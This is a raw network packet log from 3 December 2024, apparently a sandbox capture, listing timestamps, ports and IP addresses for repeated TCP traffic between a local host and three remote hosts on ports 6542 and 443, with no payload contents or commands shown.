Dec 3, 2024 17:43:24.818558931 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.818639994 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.818696976 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.820391893 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.820436001 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.820564032 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.820602894 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.822243929 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.822407961 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.822448015 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.824119091 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.824285030 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.824326038 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.825995922 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.826167107 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.826215982 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.827893972 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.827939034 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.828073025 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.829550982 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.829859972 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.829901934 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.829965115 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.830010891 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.831909895 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.831945896 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.832075119 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.832115889 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.833564997 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.833745956 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.833787918 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.835459948 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.835630894 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.835673094 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.837333918 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.837495089 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.837541103 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.839236021 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.839277983 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.839523077 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.841186047 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.841245890 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.841336012 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.843044996 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.843118906 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.843837023 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.843883038 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.843966961 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.845491886 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.845851898 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.845896959 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.846107006 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.846148014 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.847582102 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.847625017 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.848270893 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.848313093 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.848443031 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.848480940 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:43:24.850219965 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.850342989 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:43:24.850394011 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:44:47.189039946 CET	6542	49730	103.57.249.207	192.168.2.4
Dec 3, 2024 17:44:47.194964886 CET	49730	6542	192.168.2.4	103.57.249.207
Dec 3, 2024 17:44:53.090941906 CET	49851	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:44:53.090965986 CET	443	49851	104.21.68.89	192.168.2.4
Dec 3, 2024 17:44:53.091144085 CET	49851	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:44:53.091576099 CET	49851	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:44:53.091587067 CET	443	49851	104.21.68.89	192.168.2.4
Dec 3, 2024 17:44:54.304260969 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:44:54.305747032 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:44:54.379807949 CET	443	49851	104.21.68.89	192.168.2.4
Dec 3, 2024 17:44:54.379890919 CET	49851	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:44:54.413028955 CET	49851	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:44:54.413055897 CET	443	49851	104.21.68.89	192.168.2.4
Dec 3, 2024 17:44:54.413367987 CET	443	49851	104.21.68.89	192.168.2.4
Dec 3, 2024 17:44:54.413485050 CET	49851	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:44:54.415271044 CET	49851	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:44:54.455339909 CET	443	49851	104.21.68.89	192.168.2.4
Dec 3, 2024 17:44:55.277708054 CET	49732	6542	192.168.2.4	94.232.43.224
Dec 3, 2024 17:44:55.304539919 CET	49730	6542	192.168.2.4	103.57.249.207
Dec 3, 2024 17:44:55.398677111 CET	6542	49732	94.232.43.224	192.168.2.4
Dec 3, 2024 17:44:55.425040960 CET	6542	49730	103.57.249.207	192.168.2.4
Dec 3, 2024 17:44:55.962085009 CET	443	49851	104.21.68.89	192.168.2.4
Dec 3, 2024 17:44:55.962178946 CET	443	49851	104.21.68.89	192.168.2.4
Dec 3, 2024 17:44:55.962299109 CET	49851	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:44:55.965372086 CET	49851	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:44:55.965396881 CET	443	49851	104.21.68.89	192.168.2.4
Dec 3, 2024 17:44:56.842344999 CET	49861	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:44:56.842396975 CET	443	49861	104.21.68.89	192.168.2.4
Dec 3, 2024 17:44:56.842508078 CET	49861	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:44:56.842859030 CET	49861	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:44:56.842874050 CET	443	49861	104.21.68.89	192.168.2.4
Dec 3, 2024 17:44:58.055161953 CET	443	49861	104.21.68.89	192.168.2.4
Dec 3, 2024 17:44:58.055216074 CET	49861	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:44:58.055936098 CET	49861	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:44:58.055943012 CET	443	49861	104.21.68.89	192.168.2.4
Dec 3, 2024 17:44:58.057636976 CET	49861	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:44:58.057641029 CET	443	49861	104.21.68.89	192.168.2.4
Dec 3, 2024 17:44:59.611140013 CET	443	49861	104.21.68.89	192.168.2.4
Dec 3, 2024 17:44:59.611196041 CET	49861	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:44:59.611213923 CET	443	49861	104.21.68.89	192.168.2.4
Dec 3, 2024 17:44:59.611282110 CET	49861	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:44:59.611287117 CET	443	49861	104.21.68.89	192.168.2.4
Dec 3, 2024 17:44:59.611305952 CET	443	49861	104.21.68.89	192.168.2.4
Dec 3, 2024 17:44:59.611331940 CET	49861	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:44:59.611350060 CET	49861	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:44:59.614049911 CET	49861	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:44:59.614064932 CET	443	49861	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:00.362154007 CET	49869	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:00.362206936 CET	443	49869	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:00.362412930 CET	49869	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:00.362616062 CET	49869	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:00.362627029 CET	443	49869	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:01.629321098 CET	443	49869	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:01.629389048 CET	49869	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:01.630249023 CET	49869	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:01.630259037 CET	443	49869	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:01.632158041 CET	49869	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:01.632165909 CET	443	49869	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:03.275394917 CET	443	49869	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:03.275459051 CET	49869	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:03.275485039 CET	443	49869	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:03.275500059 CET	443	49869	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:03.275693893 CET	49869	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:03.287527084 CET	49869	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:03.287538052 CET	443	49869	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:04.158433914 CET	49878	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:04.158478975 CET	443	49878	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:04.158545971 CET	49878	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:04.158788919 CET	49878	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:04.158797979 CET	443	49878	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:05.379667997 CET	443	49878	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:05.379757881 CET	49878	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:05.418715954 CET	49878	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:05.418746948 CET	443	49878	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:05.474450111 CET	49878	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:05.474478960 CET	443	49878	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:07.016618013 CET	443	49878	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:07.016737938 CET	443	49878	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:07.016768932 CET	49878	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:07.017587900 CET	49878	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:07.017671108 CET	49878	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:07.017688990 CET	443	49878	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:07.024852037 CET	49886	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:07.024897099 CET	443	49886	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:07.025197983 CET	49886	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:07.025496006 CET	49886	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:07.025510073 CET	443	49886	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:08.341351986 CET	443	49886	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:08.346101999 CET	49886	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:08.350594044 CET	49886	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:08.350606918 CET	443	49886	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:10.164859056 CET	49886	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:10.164876938 CET	443	49886	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:10.537086964 CET	443	49886	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:10.537208080 CET	443	49886	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:10.537357092 CET	49886	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:10.537377119 CET	443	49886	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:10.537471056 CET	49886	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:10.537620068 CET	443	49886	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:10.538256884 CET	443	49886	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:10.538393974 CET	49886	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:10.538399935 CET	443	49886	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:10.538470030 CET	49886	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:10.538470030 CET	49886	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:10.538938999 CET	49886	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:10.542954922 CET	49894	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:10.543003082 CET	443	49894	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:10.547213078 CET	49894	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:10.550940990 CET	49894	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:10.550970078 CET	443	49894	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:11.770229101 CET	443	49894	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:11.770296097 CET	49894	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:13.163780928 CET	49894	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:13.163780928 CET	49894	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:13.163810968 CET	443	49894	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:13.163826942 CET	443	49894	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:13.164207935 CET	443	49894	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:13.164315939 CET	49894	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:13.494393110 CET	443	49894	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:13.494447947 CET	49894	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:13.494462967 CET	443	49894	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:13.494508028 CET	49894	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:13.494627953 CET	443	49894	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:13.494674921 CET	49894	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:13.494679928 CET	443	49894	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:13.494720936 CET	49894	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:13.494875908 CET	49894	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:13.494923115 CET	443	49894	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:13.494955063 CET	49894	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:13.494977951 CET	49894	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:13.508132935 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:13.508161068 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:13.508224964 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:13.508622885 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:13.508634090 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:14.774231911 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:14.774391890 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:16.214097977 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:16.214123964 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:16.214334011 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:16.214340925 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:16.214535952 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:16.214641094 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:16.562455893 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:16.562526941 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:16.562655926 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:16.562681913 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:16.562696934 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:16.562746048 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:16.562753916 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:16.562865973 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:16.563225985 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:16.567140102 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:16.567147017 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:16.567302942 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:16.569986105 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:16.570141077 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:16.570147038 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:16.570297956 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:16.578574896 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:16.579049110 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:16.579056978 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:16.579191923 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:16.586791992 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:16.586955070 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:16.682570934 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:16.683063030 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:16.762968063 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:16.766916990 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:16.767004967 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:16.767004967 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:16.767031908 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:16.771023989 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:16.774629116 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:16.775093079 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:16.775099993 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:16.775270939 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:16.782265902 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:16.782516956 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:16.782521963 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:16.782876015 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:16.790246010 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:16.790354967 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:16.797863960 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:16.798060894 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:16.798065901 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:16.798554897 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:16.809364080 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:16.809468031 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:16.809573889 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:16.809709072 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:16.809716940 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:16.809792042 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:16.813460112 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:16.813651085 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:16.813657045 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:16.813827991 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:16.821521997 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:16.821660995 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:16.829161882 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:16.829349995 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:16.829381943 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:16.829669952 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:16.836543083 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:16.836697102 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:16.836740971 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:16.836853981 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:16.963993073 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:16.964811087 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:16.964819908 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:16.964890957 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:16.966386080 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:16.966480017 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:16.966612101 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:16.966695070 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:16.971184969 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:16.971324921 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:16.971434116 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:16.971580982 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:16.976161003 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:16.976440907 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:16.981121063 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:16.981215000 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:16.981317997 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:16.981427908 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:16.990931988 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:16.991020918 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.000818014 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.000993967 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.005711079 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.005827904 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.010675907 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.010785103 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.020471096 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.020570040 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.030332088 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.030523062 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.035264969 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.035408020 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.045237064 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.045327902 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.054673910 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.054835081 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.064546108 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.064683914 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.084451914 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.084599018 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.176695108 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.177076101 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.180650949 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.180788040 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.188293934 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.188519001 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.195218086 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.195421934 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.198921919 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.199040890 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.205823898 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.205965042 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.212735891 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.212908030 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.214735031 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.214931011 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.218240976 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.218408108 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.221991062 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.222143888 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.223995924 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.224114895 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.227821112 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.227941990 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.231403112 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.231525898 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.235013962 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.237193108 CET	443	49904	104.21.68.89	192.168.2.4
Dec 3, 2024 17:45:17.237339020 CET	49904	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:45:17.237359047 CET	443	49904	104.21.68.89	192.168.2.4
